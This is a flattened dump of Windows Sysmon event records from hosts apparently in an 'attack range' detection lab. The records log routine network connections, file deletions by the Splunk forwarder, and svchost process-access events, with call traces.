Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53252-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000285389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:38.939{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53251-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000285400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:42.947{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7596B645602663F633433365FC2ACE48,SHA256=FA8B718610B65CB9C9541CA9F368F067AFE660DFC272B1E0B4F2DE7024F4636A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:42.161{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC3FC261C61031D1B33478BA1F877DC,SHA256=DA08CC85984A500C59F6995B5581176238714AEF88E74A3A94C69787F9EF9E9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.178{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53255-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000285398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.178{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53255-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000285397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.082{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53254-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.082{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53254-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.068{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53253-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.068{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53253-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000214510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:43.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2D551266F7DE3814541E8EC51CA543B,SHA256=71C708FDF8C99E41B423A22807EA7E0BA6754345B0E7827375D4D4F1D063854C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.447{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 